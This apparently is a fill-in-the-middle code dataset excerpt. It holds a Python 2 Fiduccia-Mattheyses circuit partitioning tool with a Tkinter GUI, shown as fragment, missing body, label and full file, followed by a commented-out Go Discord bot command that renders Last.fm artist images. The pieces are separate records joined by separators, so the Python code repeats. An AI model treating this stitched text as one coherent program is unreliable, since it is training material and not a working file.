self.toolbarFrame = tk.Frame(self.master)
self.toolbarFrame.grid(row=2,column=0,columnspan=3,sticky="W")
self.toolbarPlot = NavigationToolbar2TkAgg(self.canvasPlot,self.toolbarFrame)
def showGraph(self):
""" User selection to display graph """
self.graph_button['state'] = 'disabled'
# Draw connection Graph
self.axGraph.set_visible(True)
nx.draw(self.G, ax=self.axGraph, with_labels=True)
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def showPlot(self):
""" User selection to display Cost """
self.plot = not self.plot
if self.plot:
self.plot_button['text'] = "No Plot"
else:
self.plot_button['text'] = "Plot"
def drawCells(self):
""" User selection to display Circuit Cells """
self.drawing = not self.drawing
if self.drawing:
self.draw_button['text'] = "No Draw"
else:
self.draw_button['text'] = "Draw"
def startRunning(self):
""" User control for placement process """
self.start_button['state'] = 'disabled'
self.pause_button['state'] = 'normal'
self.running = True
# If first run and not continuation from pause
if (self.firstRun):
self.start_timer = time.clock()
# Run the FM partitioning process
self._startpartition(False)
# Always display result at the end of the process
self.updateDraw()
#self.updatePlot() #TODO: What to plot
# Disable Buttons when finished
self.pause_button['state'] = 'disabled'
self.plot_button['state'] = 'disabled'
self.draw_button['state'] = 'disabled'
def pauseRunning(self):
""" Pause process of SA by exiting loop """
self.start_button['state'] = 'normal'
self.pause_button['state'] = 'disabled'
self.running = False
def _startpartition(self,quietMode):
""" Start Partitioning Process """
# On the first run do the initial split placement and gain computation. This allows pausing and continuing the process
if (self.firstRun == True):
self.splitPlace()
self.gain()
self.firstRun=False
self.cutCost()
startTimer = time.clock()
self.totalCutCost = self.FMPartition(quietMode)
timeDif = time.clock() - startTimer
print self.totalCutCost, " ",
print timeDif
def FMPartition(self,quietMode):
bestCutCost = self.totalCutCost
for loop in range(0,6):
difParts = -1
i=1
self.cntLocked = 0
while self.cntLocked<self.cells:
# Keep searching while the size difference is outside [0, 2], i.e. while moving this node would unbalance the partitions
while not (2>=difParts>=0):
moveNode = self.gainOrder[self.cells-i][1]
moveNodePart = self.G.node[moveNode]["part"]
if self.G.node[moveNode]["locked"]:
i+=1
continue
if moveNodePart == 'A':
movePartSites = self.sitesA
tgtPartSites = self.sitesB
tgtPart = 'B'
else:
movePartSites = self.sitesB
tgtPartSites = self.sitesA
tgtPart = 'A'
# Difference on the number of cells on each site
difParts = len(movePartSites)-len(tgtPartSites) #TODO: Change for incremental size for performance
i+=1
i=1
self.G.node[moveNode]["locked"]=True
self.cntLocked+=1
movePartSites.remove(moveNode)
tgtPartSites.append(moveNode)
self.G.node[moveNode]["part"] = tgtPart
self.incrGain(moveNode)
difParts = -1
self.cutCost()
if not quietMode:
self.axCost.set_title("Best Cost=" + str(bestCutCost))
self.updatePlot(self.totalCutCost)
# Store best result
if (self.totalCutCost<=bestCutCost):
if (self.totalCutCost==bestCutCost):
if (random.random() < 0.8):
continue
self.sitesABkp = list(self.sitesA)
self.sitesBBkp = list(self.sitesB)
self.gainOrderBkp = list(self.gainOrder)
self.GBkp = self.G.copy()
bestCutCost=self.totalCutCost
self.cntLocked=0
self.sitesA = list(self.sitesABkp)
self.sitesB = list(self.sitesBBkp)
self.gainOrder = list(self.gainOrderBkp)
self.keys = [r[1] for r in self.gainOrder]
self.G = self.GBkp.copy()
for node in self.G.nodes():
self.G.node[node]["locked"]=False
return bestCutCost
def cutCost(self):
self.totalCutCost = 0
for node in self.G.nodes():
nodePart = self.G.node[node]["part"]
for nb in self.G.neighbors(node):
if self.G.node[nb]["part"]!=nodePart:
self.totalCutCost+=1
break
def cutIncrCost(self):
pass #TODO:
def updateDraw(self):
|
def updatePlot(self,cost):
""" Cost plot gets updated on every new cost value """
timer = time.clock() - self.start_timer
# Add new values to plot data set
self.lines.set_xdata(np.append(self.lines.get_xdata(), timer))
self.lines.set_ydata(np.append(self.lines.get_ydata(), cost))
# Re-scale
self.axCost.relim()
self.axCost.autoscale_view()
# Update plot
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def splitPlace(self):
""" SPlit placement, for every node a Partition is assigned """
nodeSortedIter = sorted(self.G.degree_iter(),key=itemgetter(1),reverse=True)
placeCnt = 0
for node in nodeSortedIter:
if placeCnt<self.cells/2:
self.sitesA.append(node[0])
self.G.node[node[0]]["part"] = 'A'
else:
self.sitesB.append(node[0])
self.G.node[node[0]]["part"] = 'B'
placeCnt+=1
def randPlace(self):
""" Random placement, for every node a Site is assigned """
random.seed(self.seed)
# Start placement on Partition A
partA = True
for node in self.G.nodes():
randSite = random.randint(0,int(self.sitesNum/2)-1)
if partA:
partSite = self.sitesA
self.G.node[node]["part"] = 'A'
else:
partSite = self.sitesB
self.G.node[node]["part"] = 'B'
while (partSite[randSite].isOcp()):
randSite = random.randint(0,int(self.sitesNum/2)-1)
partSite[randSite].setCell(node)
self.G.node[node]["site"] = partSite[randSite]
# Toggle partition for next placement
partA = not partA
def drawConns(self):
""" Extract center point from each node and draw connection to other nodes """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
for nb in self.G.neighbors(node):
nbX,nbY = self.G.node[nb]["site"].getCenter()
self.connLines.append(self.canvasCirkt.create_line(pX,pY,nbX,nbY))
self.canvasCirkt.update()
def drawTags(self):
""" Extract center point from each node and draw node Tag """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
self.tags.append(self.canvasCirkt.create_text(pX, pY, text=node))
self.canvasCirkt.update()
def delConns(self):
""" Delete Connections on Circuit using array of Line objects """
for line in self.connLines:
self.canvasCirkt.delete(line)
self.canvasCirkt.update()
def delTags(self):
""" Delete Tags on Circuit using array of Text objects """
for tag in self.tags:
self.canvasCirkt.delete(tag)
self.canvasCirkt.update()
def gain(self):
""" Find the gain of every node by finding the difference between the number of nodes connected to that node on the same partition (retention force)
and the number of nodes connected that are on the other partition (moving force)"""
for node in self.G.nodes():
# Get number of nodes connected on same and other partition
movForce, retForce = self.nodeForces(node)
nodeGain = movForce-retForce
#Fill list of Nodes with gains
self.gainOrder.append((nodeGain,node))
self.gainOrder.sort(key=lambda r: r[0])
self.keys = [r[1] for r in self.gainOrder]
def incrGain(self,movedNode):
movedNets = set([movedNode])
movedNets.update(self.G.neighbors(movedNode))
movedNets.update(self.G.node[movedNode]["nets"])
for movedNet in movedNets:
movForce, retForce = self.nodeForces(movedNet)
nodeGain = movForce-retForce
del self.gainOrder[self.keys.index(movedNet)]
bisect.insort(self.gainOrder, (nodeGain,movedNet))
self.keys = [r[1] for r in self.gainOrder]
def nodeForces(self,node):
nodePart = self.G.node[node]["part"]
movForce = 0
retForce = 0
for nb in set(self.G.neighbors(node)):
if nodePart != self.G.node[nb]["part"]:
movForce+=3
else:
retForce+=1
connNodes = set(self.G.node[node]["nets"])
for connNode in connNodes:
if nodePart != self.G.node[connNode]["part"]:
movForce+=3
else:
retForce+=1
return movForce, retForce
def quitApp(self):
""" Exit """
self.master.destroy()
self.master.quit()
def main(argv):
#==============Initialize Graphics============#
root = tk.Tk()
#=================Options=================#
# Default Values
inputfile = None
quietMode = False
seed = 30
try:
opts, args = getopt.getopt(argv, "hqs:t:i:", ["ifile="])
except getopt.GetoptError:
print 'test.py -i <inputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> [-q] [-s <Seed>]'
print "-q : Quiet Mode"
print "-t <Temperature>: Initial temperature for SA"
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt == '-s':
seed = int(arg)
elif opt == "-q":
quietMode = True
if (not inputfile):
print 'test.py -i <inputfile>'
sys.exit(2)
partition = Partition(root,seed,inputfile,quietMode)
root.wm_title("FM Partitioning Tool. EECE583: Jose Pinilla")
root.protocol('WM_DELETE_WINDOW', partition.quitApp)
root.resizable(False, False)
root.mainloop()
if __name__ == "__main__":
main(sys.argv[1:])
| """ Draw circuit Connections and Cell Tags """
self.delConns()
self.delTags()
self.drawConns()
self.drawTags() | identifier_body |
partitionA3.py | import time
import sys
import getopt
import partitionGUI
import random
import math
import bisect
import numpy as np
import Tkinter as tk
import networkx as nx
import matplotlib.pyplot as plt
from operator import itemgetter
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from _bisect import bisect_left
from time import sleep
class Partition():
""" Circuit Cell partitioning using Fiduccia-Matheyses
Circuit: A representation of a circuit by Cells to be partitioned in two sites
Cell: Circuit component represented as a Graph node with connections to other Cells as edges
Node: Graph representation of a Cell
Site: Possible location for a Cell (Is Free or is occupied by a Cell)
Block: Graphic representation and data of a Site
"""
def __init__(self,master,seed,inputfile,quietMode):
#=============Parse file to create cells graph===============#
# Create Directed Graph and fill with input file
self.G=nx.DiGraph()
fin = open(inputfile,'r')
self.getGraph(fin)
fin.close()
#================Create Data Structures================#
# Array of Line objects to draw connections
self.connLines = []
# Array of Block objects drawing the rectangles for each site on the circuit, tracks occupancy.
# One per partition
self.sitesA = []
self.blocksA = []
self.sitesB = []
self.blocksB = []
self.sitesABkp = []
self.sitesBBkp = []
# List of Nodes sorted by gains
self.gainOrder = []
# Array of Text objects noting the name of the node assigned to a cell site
self.tags = []
# Assign Initial Seed
self.seed = seed
#================Draw Buttons and plots================#
self.master = master
self.initialize_buttons()
self.initialize_plots()
# Quiet Mode to run without graphics
if quietMode:
self.running = True
# FM Partitioning Algorithm
self._startpartition(True)
sys.exit()
def getGraph(self, fin):
""" Parse Input File to fill up Graph structure """
tmpList = fin.readline().split()
# Number of Cells to be partitioned
self.cells = int(tmpList[0])
# Number of Connections or Nets
self.conns = int(tmpList[1])
# Number of Circuit Rows
self.rows = int(tmpList[2])
# Number of Circuit Columns
self.cols = int(tmpList[3])
# Number of available sites in the Circuit
self.sitesNum = self.rows*self.cols
self.winX = self.cols/4
self.winY = self.rows/4
# Add nodes from 0 to number of Cells to graph structure and initialize net array and net cost
self.G.add_nodes_from(range(0,self.cells))
for node in self.G.nodes():
self.G.node[node]["nets"]=[]
self.G.node[node]["locked"]=False
# For every Net, add edges between corresponding nodes
for net in range(0,self.conns):
tmpList = fin.readline().split()
numNodes = int(tmpList[0])
srcNode = int(tmpList[1])
#self.G.node[srcNode]["nets"].append(srcNode)
for conn in range(2,numNodes+1):
self.G.add_edge(srcNode, int(tmpList[conn]))
self.G.node[int(tmpList[conn])]["nets"].append(srcNode)
def initialize_buttons(self):
""" Draw User Buttons on top of interface
Start: Begin placement process
Pause: Pause process. Allows continuing.
Graph: Show Graph nodes to visualize connections
Plot: Show Cost plot to see SA progress
Draw: Show Circuit Cells
"""
self.start_button = tk.Button(self.master, text='Start', command = self.startRunning)
self.start_button.grid(row=0, column=0)
self.pause_button = tk.Button(self.master, text='Pause', command = self.pauseRunning)
self.pause_button.grid(row=0, column=1)
self.graph_button = tk.Button(self.master, text='Graph', command = self.showGraph)
self.graph_button.grid(row=0, column=2)
self.plot_button = tk.Button(self.master, text='Plot', command = self.showPlot)
self.plot_button.grid(row=0, column=3)
self.draw_button = tk.Button(self.master, text='Draw', command = self.drawCells)
self.draw_button.grid(row=0, column=4)
# Initialize Button States and Actions
self.pause_button['state'] = 'disabled'
# Boolean switch to control flow of placement process
self.running = False
# Boolean switch to plot placement connections and tags, turn off for faster processing
self.plot = False
self.drawing = False
self.graph = False
# Boolean switch to specify first run and allow stop/continue behavior that doesn't initialize program
self.firstRun = True
def initialize_plots(self):
""" Draw all graphic components as Canvases
Circuit Canvas: Drawing of the Circuit Sites Rows and Columns to overlay Cell Placement and Connections
Graph Canvas: Drawing of the Graph structure used for the representation of the Cells
            Cost Plot Canvas: Plotting of the Cost Function used in the Partitioning Process
Plot Toolbar: Toolbar options to explore the Graph and Cost Canvases (Zoom, Save, Move...)
"""
#============================Draw circuit canvas=================================#
# Draw Canvas with hardcoded width 600 and adjustable height to circuit input
ckt_max_x = 600
ckt_max_y = (ckt_max_x*(self.rows))/self.cols
scale_x = round(ckt_max_x / self.cols)
scale_y = round(ckt_max_y / self.rows)
self.canvasCirkt = tk.Canvas(self.master,width=ckt_max_x+scale_x,height=(ckt_max_y*2)+int(scale_y))
self.canvasCirkt.grid(row=1,column=1,columnspan=4)
# Draw border
self.canvasCirkt.create_rectangle(1, 1, (ckt_max_x+2)/2, (ckt_max_y*2)+int(scale_y))
self.canvasCirkt.create_rectangle(((ckt_max_x+2)/2)+scale_x, 1, ckt_max_x+scale_x, (ckt_max_y*2)+int(scale_y))
# Draw cell rows and columns in two groups
blockIndex=0
for cut in range(int(scale_y), int(ckt_max_y*2), int(scale_y)*2):
for cut2 in range(1, int(ckt_max_x), int(scale_x)):
if (cut2>ckt_max_x/2):
cut2+=scale_x
# Coordinates for top and bottom points of rectangle
points = (cut2, cut, cut2+scale_x-1, cut+scale_y)
blockObj = partitionGUI.Block(self.canvasCirkt,points,blockIndex,self.rows,self.cols)
blockIndex+=1
if (cut2>ckt_max_x/2):
self.blocksB.append(blockObj)
else:
self.blocksA.append(blockObj)
#===================================Draw Plots================================#
# Draw Figure for 2 subplots (Connections Graph and Cost Function)
self.figure, self.axes = plt.subplots(2, facecolor="white")
self.figure.set_figwidth(4)
self.axGraph = self.axes[0]
self.axCost = self.axes[1]
# Initial condition for connection Graph
self.axGraph.set_visible(False)
# Select Cost Plot as current Axis. Get lines to use for plot updates
plt.sca(self.axCost)
self.lines, = self.axCost.plot([],[])
self.axCost.set_xlabel("Time")
self.axCost.set_title("Cost")
# Draw Cost function Plot
self.canvasPlot = FigureCanvasTkAgg(self.figure, master=self.master)
self.canvasPlot.get_tk_widget().grid(row=1,column=0)
# Draw Tool Bar
self.toolbarFrame = tk.Frame(self.master)
self.toolbarFrame.grid(row=2,column=0,columnspan=3,sticky="W")
self.toolbarPlot = NavigationToolbar2TkAgg(self.canvasPlot,self.toolbarFrame)
def showGraph(self):
""" User selection to display graph """
self.graph_button['state'] = 'disabled'
# Draw connection Graph
self.axGraph.set_visible(True)
nx.draw(self.G, ax=self.axGraph, with_labels=True)
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def showPlot(self):
""" User selection to display Cost """
self.plot = not self.plot
if self.plot:
self.plot_button['text'] = "No Plot"
else:
self.plot_button['text'] = "Plot"
def drawCells(self):
""" User selection to display Circuit Cells """
self.drawing = not self.drawing
if self.drawing:
self.draw_button['text'] = "No Draw"
else:
self.draw_button['text'] = "Draw"
def startRunning(self):
""" User control for placement process """
self.start_button['state'] = 'disabled'
self.pause_button['state'] = 'normal'
self.running = True
# If first run and not continuation from pause
if (self.firstRun):
self.start_timer = time.clock()
        # FM Partitioning Algorithm
self._startpartition(False)
# Always display result at the end of the process
self.updateDraw()
#self.updatePlot() #TODO: What to plot
# Disable Buttons when finished
self.pause_button['state'] = 'disabled'
self.plot_button['state'] = 'disabled'
self.draw_button['state'] = 'disabled'
def pauseRunning(self):
""" Pause process of SA by exiting loop """
self.start_button['state'] = 'normal'
self.pause_button['state'] = 'disabled'
self.running = False
def _startpartition(self,quietMode):
""" Start Partitioning Process """
        # On the first run do the initial split placement. This allows pausing and continuing the process
if (self.firstRun == True):
self.splitPlace()
self.gain()
self.firstRun=False
self.cutCost()
startTimer = time.clock()
self.totalCutCost = self.FMPartition(quietMode)
timeDif = time.clock() - startTimer
print self.totalCutCost, " ",
print timeDif
def FMPartition(self,quietMode):
bestCutCost = self.totalCutCost
for loop in range(0,6):
difParts = -1
i=1
self.cntLocked = 0
while self.cntLocked<self.cells:
                # Keep searching while the size difference is outside [0, 2]; a move is accepted only if it will not unbalance the partitions
while not (2>=difParts>=0):
moveNode = self.gainOrder[self.cells-i][1]
moveNodePart = self.G.node[moveNode]["part"]
if self.G.node[moveNode]["locked"]:
i+=1
continue
if moveNodePart == 'A':
movePartSites = self.sitesA
tgtPartSites = self.sitesB
tgtPart = 'B'
else:
movePartSites = self.sitesB
tgtPartSites = self.sitesA
tgtPart = 'A'
# Difference on the number of cells on each site
difParts = len(movePartSites)-len(tgtPartSites) #TODO: Change for incremental size for performance
i+=1
i=1
self.G.node[moveNode]["locked"]=True
self.cntLocked+=1
movePartSites.remove(moveNode)
tgtPartSites.append(moveNode)
self.G.node[moveNode]["part"] = tgtPart
self.incrGain(moveNode)
difParts = -1
self.cutCost()
if not quietMode:
self.axCost.set_title("Best Cost=" + str(bestCutCost))
self.updatePlot(self.totalCutCost)
# Store best result
if (self.totalCutCost<=bestCutCost):
if (self.totalCutCost==bestCutCost):
if (random.random() < 0.8):
continue
self.sitesABkp = list(self.sitesA)
self.sitesBBkp = list(self.sitesB)
self.gainOrderBkp = list(self.gainOrder)
self.GBkp = self.G.copy()
bestCutCost=self.totalCutCost
self.cntLocked=0
self.sitesA = list(self.sitesABkp)
self.sitesB = list(self.sitesBBkp)
self.gainOrder = list(self.gainOrderBkp)
self.keys = [r[1] for r in self.gainOrder]
self.G = self.GBkp.copy()
for node in self.G.nodes():
self.G.node[node]["locked"]=False
return bestCutCost
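    # Each outer iteration above is one FM pass: every cell is moved exactly once and
    # locked, the best cut seen during the pass is checkpointed (sitesA/B, gainOrder, G),
    # and that checkpoint is restored with all cells unlocked before the next pass.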
def cutCost(self):
self.totalCutCost = 0
for node in self.G.nodes():
nodePart = self.G.node[node]["part"]
for nb in self.G.neighbors(node):
if self.G.node[nb]["part"]!=nodePart:
self.totalCutCost+=1
break
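    # Note: a node adds at most 1 to totalCutCost no matter how many of its neighbours
    # lie across the cut (hence the break above), so this is a count of cut nodes rather
    # than a count of cut edges or nets.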
def cutIncrCost(self):
pass #TODO:
def updateDraw(self):
""" Draw circuit Connections and Cell Tags """
self.delConns()
self.delTags()
self.drawConns()
self.drawTags()
def updatePlot(self,cost):
""" Cost plot gets updated on every new cost value """
timer = time.clock() - self.start_timer
# Add new values to plot data set
self.lines.set_xdata(np.append(self.lines.get_xdata(), timer))
self.lines.set_ydata(np.append(self.lines.get_ydata(), cost))
# Re-scale
self.axCost.relim()
self.axCost.autoscale_view()
# Update plot
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def splitPlace(self):
""" SPlit placement, for every node a Partition is assigned """
nodeSortedIter = sorted(self.G.degree_iter(),key=itemgetter(1),reverse=True)
placeCnt = 0
for node in nodeSortedIter:
if placeCnt<self.cells/2:
self.sitesA.append(node[0])
self.G.node[node[0]]["part"] = 'A'
else:
self.sitesB.append(node[0])
self.G.node[node[0]]["part"] = 'B'
placeCnt+=1
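    # The initial split visits nodes in decreasing degree order and sends the first
    # half to partition A and the rest to partition B, so the most connected cells
    # start out together in A.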
def randPlace(self):
""" Random placement, for every node a Site is assigned """
random.seed(self.seed)
# Start placement on Partition A
partA = True
for node in self.G.nodes():
randSite = random.randint(0,int(self.sitesNum/2)-1)
if partA:
partSite = self.sitesA
self.G.node[node]["part"] = 'A'
else:
partSite = self.sitesB
self.G.node[node]["part"] = 'B'
while (partSite[randSite].isOcp()):
randSite = random.randint(0,int(self.sitesNum/2)-1)
partSite[randSite].setCell(node)
self.G.node[node]["site"] = partSite[randSite]
# Toggle partition for next placement
partA = not partA
def drawConns(self):
""" Extract center point from each node and draw connection to other nodes """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
for nb in self.G.neighbors(node):
nbX,nbY = self.G.node[nb]["site"].getCenter()
self.connLines.append(self.canvasCirkt.create_line(pX,pY,nbX,nbY))
self.canvasCirkt.update()
def drawTags(self):
""" Extract center point from each node and draw node Tag """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
self.tags.append(self.canvasCirkt.create_text(pX, pY, text=node))
self.canvasCirkt.update()
def delConns(self):
""" Delete Connections on Circuit using array of Line objects """
for line in self.connLines:
self.canvasCirkt.delete(line)
self.canvasCirkt.update()
def delTags(self):
""" Delete Tags on Circuit using array of Text objects """
for tag in self.tags:
self.canvasCirkt.delete(tag)
self.canvasCirkt.update()
def gain(self):
""" Find the gain of every node by finding the difference between the number of nodes connected to that node on the same partition (retention force)
and the number of nodes connected that are on the other partition (moving force)"""
for node in self.G.nodes():
# Get number of nodes connected on same and other partition
movForce, retForce = self.nodeForces(node)
nodeGain = movForce-retForce
#Fill list of Nodes with gains
self.gainOrder.append((nodeGain,node))
self.gainOrder.sort(key=lambda r: r[0])
self.keys = [r[1] for r in self.gainOrder]
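    # Rough illustration: a node whose nodeForces() come back as movForce=9, retForce=2
    # gets gain 7 and sorts towards the end of gainOrder (ascending sort), so
    # FMPartition(), which picks candidates from the end of the list, will try to move
    # it early; a node with mostly same-partition connections gets a negative gain.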
def incrGain(self,movedNode):
movedNets = set([movedNode])
movedNets.update(self.G.neighbors(movedNode))
movedNets.update(self.G.node[movedNode]["nets"])
for movedNet in movedNets:
movForce, retForce = self.nodeForces(movedNet)
nodeGain = movForce-retForce
del self.gainOrder[self.keys.index(movedNet)]
bisect.insort(self.gainOrder, (nodeGain,movedNet))
self.keys = [r[1] for r in self.gainOrder]
def nodeForces(self,node):
nodePart = self.G.node[node]["part"]
movForce = 0
retForce = 0
for nb in set(self.G.neighbors(node)):
if nodePart != self.G.node[nb]["part"]:
movForce+=3
else:
retForce+=1
connNodes = set(self.G.node[node]["nets"])
for connNode in connNodes:
if nodePart != self.G.node[connNode]["part"]:
movForce+=3
else:
retForce+=1
return movForce, retForce
def quitApp(self):
""" Exit """
self.master.destroy()
self.master.quit()
def main(argv):
#==============Initialize Graphics============#
root = tk.Tk()
#=================Options=================#
# Default Values
inputfile = None
quietMode = False
seed = 30
try:
opts, args = getopt.getopt(argv, "hqs:t:i:", ["ifile="])
except getopt.GetoptError:
print 'test.py -i <inputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> [-q] [-s <Seed>]'
print "-q : Quiet Mode"
print "-t <Temperature>: Initial temperature for SA"
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt == '-s':
seed = int(arg)
elif opt == "-q":
quietMode = True
if (not inputfile):
print 'test.py -i <inputfile>'
sys.exit(2)
partition = Partition(root,seed,inputfile,quietMode)
root.wm_title("FM Partitioning Tool. EECE583: Jose Pinilla")
root.protocol('WM_DELETE_WINDOW', partition.quitApp)
root.resizable(False, False)
root.mainloop()
if __name__ == "__main__":
main(sys.argv[1:])
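# Example invocation (script and benchmark names are hypothetical):
#   python partition.py -i benchmarks/cm138a.txt -s 42
#   python partition.py -i benchmarks/cm138a.txt -q     # quiet mode: prints cut cost and runtime, then exits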
band.go
package commands
// import (
// "errors"
// "fmt"
// "os"
// "persephone/database"
// "persephone/fm"
// "persephone/lib"
// "strconv"
// "strings"
// "github.com/andersfylling/disgord"
// "github.com/cavaliercoder/grab"
// "github.com/fogleman/gg"
// "github.com/nfnt/resize"
// "github.com/pazuzu156/atlas"
// "github.com/pazuzu156/lastfm-go"
// "golang.org/x/text/language"
// "golang.org/x/text/message"
// )
// // album and track positions for grids
// var (
// albumPositions = []fm.AlbumPosition{
// {
// X: 355,
// Y: 170,
// Shadow: fm.Shadow{
// X: 350,
// Y: 165,
// R: 10,
// },
// Info: fm.InfoText{
// X: 350,
// Y: 340,
// Plays: fm.PlaysText{
// X: 350,
// Y: 360,
// },
// },
// },
// {
// X: 555,
// Y: 170,
// Shadow: fm.Shadow{
// X: 550,
// Y: 165,
// R: 10,
// },
// Info: fm.InfoText{
// X: 550,
// Y: 340,
// Plays: fm.PlaysText{
// X: 550,
// Y: 360,
// },
// },
// },
// {
// X: 355,
// Y: 390,
// Shadow: fm.Shadow{
// X: 350,
// Y: 385,
// R: 10,
// },
// Info: fm.InfoText{
// X: 350,
// Y: 560,
// Plays: fm.PlaysText{
// X: 350,
// Y: 580,
// },
// },
// },
// {
// X: 555,
// Y: 390,
// Shadow: fm.Shadow{
// X: 550,
// Y: 385,
// R: 10,
// },
// Info: fm.InfoText{
// X: 550,
// Y: 560,
// Plays: fm.PlaysText{
// X: 550,
// Y: 580,
// },
// },
// },
// }
// trackPositions = []fm.TrackPosition{
// {
// X: 720,
// Y: 180,
// Plays: fm.PlaysText{
// X: 870,
// Y: 180,
// },
// },
// {
// X: 720,
// Y: 210,
// Plays: fm.PlaysText{
// X: 870,
// Y: 210,
// },
// },
// {
// X: 720,
// Y: 240,
// Plays: fm.PlaysText{
// X: 870,
// Y: 240,
// },
// },
// {
// X: 720,
// Y: 270,
// Plays: fm.PlaysText{
// X: 870,
// Y: 270,
// },
// },
// }
// )
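// Layout note: the four album slots above form a 2x2 grid (x roughly 355/555, y roughly
// 170/390) and the four track slots a single column at x=720 with play counts at x=870.
// These are fixed pixel coordinates tuned to the 1000x600 canvas built in
// displayArtistInfo, so changing the canvas size would mean retuning them.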
// // Band command.
// type Band struct{ Command }
// // InitBand initializes the band command.
// func InitBand() Band {
// return Band{Init(&CommandItem{
// Name: "band",
// Description: "Gets information on the artist you're currently listening to",
// Aliases: []string{"b"},
// Usage: "band Gorguts",
// Parameters: []Parameter{
// {
// Name: "artist",
// Description: "Gets information on a requested artist",
// Required: false,
// },
// },
// })}
// }
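// Hypothetical chat usage (the command prefix depends on the bot configuration):
//   "!band Gorguts"  -> look up a named artist
//   "!band" or "!b"  -> fall back to the artist the caller is currently scrobbling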
// // Register registers and runs the band command.
// func (c Band) Register() *atlas.Command {
// c.CommandInterface.Run = func(ctx atlas.Context) {
// // this command takes a really long time to complete
// // this message lets the user know that the bot is working
// tempmsg, _ := ctx.Message.Reply(ctx.Atlas, "Please wait while the artist image is generated...")
// defer ctx.Atlas.DeleteMessage(tempmsg.ChannelID, tempmsg.ID) // delete message when command completes
// // Want to check if an artist is supplied or not
// if len(ctx.Args) > 0 {
// artistName := strings.Trim(strings.Join(ctx.Args, " "), " ")
// artist, err := c.getArtistInfo(artistName, ctx.Message.Author)
// if err != nil {
// ctx.Message.Reply(ctx.Atlas, err.Error())
// return
// }
// c.displayArtistInfo(ctx, artist) // display info with requested artist
// } else {
// // current track should have the artist info we need to do a new artist query
// track, err := fm.GetNowPlayingTrack(ctx.Message.Author, c.Lastfm)
// if err != nil {
// ctx.Message.Reply(ctx.Atlas, err.Error())
// return
// }
// artist, err := c.getArtistInfo(track.Artist.Name, ctx.Message.Author) // get full artist info
// if err != nil {
// ctx.Message.Reply(ctx.Atlas, "Couldn't find that artist")
// }
// c.displayArtistInfo(ctx, artist) // display info with current artist
// }
// }
// return c.CommandInterface
// }
// func (c Band) displayArtistInfo(ctx atlas.Context, artist lastfm.ArtistGetInfo) {
// albums := c.getAlbumsList(ctx, artist) // gets users albums from artist
// tracks, err := c.getTracksList(ctx, artist) // gets users tracks from artist
// if err != nil {
// ctx.Message.Reply(ctx.Atlas, err.Error())
// return
// }
// lfmuser, _ := database.GetLastfmUserInfo(ctx.Message.Author, c.Lastfm)
// aimg := lib.GetArtistImage(artist) // artist image is scraped from metal-archives
// avres, _ := grab.Get(lib.LocGet("temp/"), lib.GenAvatarURL(ctx.Message.Author))
// bg := lib.OpenImage(lib.LocGet("static/images/background.png"))
// av := lib.OpenImage(avres.Filename)
// os.Remove(avres.Filename)
// air := resize.Resize(230, 230, aimg, resize.Bicubic)
// avr := resize.Resize(72, 72, av, resize.Bicubic)
// dc := gg.NewContext(1000, 600)
// dc.DrawImage(bg, 0, 0)
// // artist image shadow
// dc.SetRGBA(1, 1, 1, 0.2)
// dc.DrawRectangle(0, 50, 1000, 72)
// dc.Fill()
// // artist image
// dc.SetRGBA(0, 0, 0, 0.3)
// dc.DrawRoundedRectangle(50, 50, 240, 240, 10)
// dc.Fill()
// dc.DrawImage(air, 55, 55)
// // artist name and play count
// dc.SetRGB(0.9, 0.9, 0.9)
// dc.LoadFontFace(FontBold, 20)
// dc.DrawStringWrapped(artist.Name, 50, 310, 0, 0, 230, 1.5, gg.AlignCenter)
// dc.LoadFontFace(FontRegular, 20)
// dc.DrawStringWrapped(fmt.Sprintf("%s plays", artist.Stats.UserPlays), 50, 345, 0, 0, 235, 1.5, gg.AlignCenter)
// // separator between artist name and tags
// dc.DrawLine(50, 370, 285, 370)
// dc.SetLineWidth(0.5)
// dc.Stroke()
// // Get the artist tags, and stringify them
// var tags []string
// for _, tag := range artist.Tags {
// tags = append(tags, tag.Name)
// }
// // tags
// dc.DrawStringWrapped(lib.JoinString(tags, ", "), 50, 380, 0, 0, 235, 1.5, gg.AlignCenter)
// // user avatar/info
// dc.DrawImage(avr, 315, 50)
// dc.LoadFontFace(FontBold, 26)
// dc.SetRGB(0.9, 0.9, 0.9)
// dc.DrawString(ctx.Message.Author.Username+" ("+lfmuser.Name+")", 400, 80)
// // scrobble count
// dc.LoadFontFace(FontRegular, 20)
// dc.SetRGB(0.9, 0.9, 0.9)
// printer := message.NewPrinter(language.English)
// pc, _ := strconv.Atoi(lfmuser.PlayCount)
// dc.DrawString(fmt.Sprintf("%s scrobbles", printer.Sprintf("%d", pc)), 400, 110)
// dc.DrawString("Albums", 490, 150)
// // takes all albums and aranges them in a 2x2 grid
// for i, album := range albums {
// if i < len(albums) && i < 4 {
// ares, _ := grab.Get(lib.LocGet("temp/"), album.Images[3].URL)
// ai := lib.OpenImage(ares.Filename)
// os.Remove(ares.Filename)
// ar := resize.Resize(145, 145, ai, resize.Bicubic)
// pos := albumPositions[i]
// // shadow
// dc.SetRGBA(0, 0, 0, 0.3)
// dc.DrawRoundedRectangle(pos.Shadow.X, pos.Shadow.Y, 155, 155, pos.Shadow.R)
// dc.Fill()
// // album image
// dc.DrawImage(ar, pos.X, pos.Y)
// // album name/play count
// dc.SetRGBA(1, 1, 1, 0.9)
// dc.LoadFontFace(FontRegular, 20)
// dc.DrawString(lib.ShortStr(album.Name, 15), pos.Info.X, pos.Info.Y)
// dc.LoadFontFace(FontRegular, 16)
// dc.DrawString(fmt.Sprintf("%s plays", album.PlayCount), pos.Info.Plays.X, pos.Info.Plays.Y)
// }
// }
// dc.LoadFontFace(FontRegular, 20)
// dc.DrawString("Tracks", 790, 150)
// // takes top tracks and lists the top 4
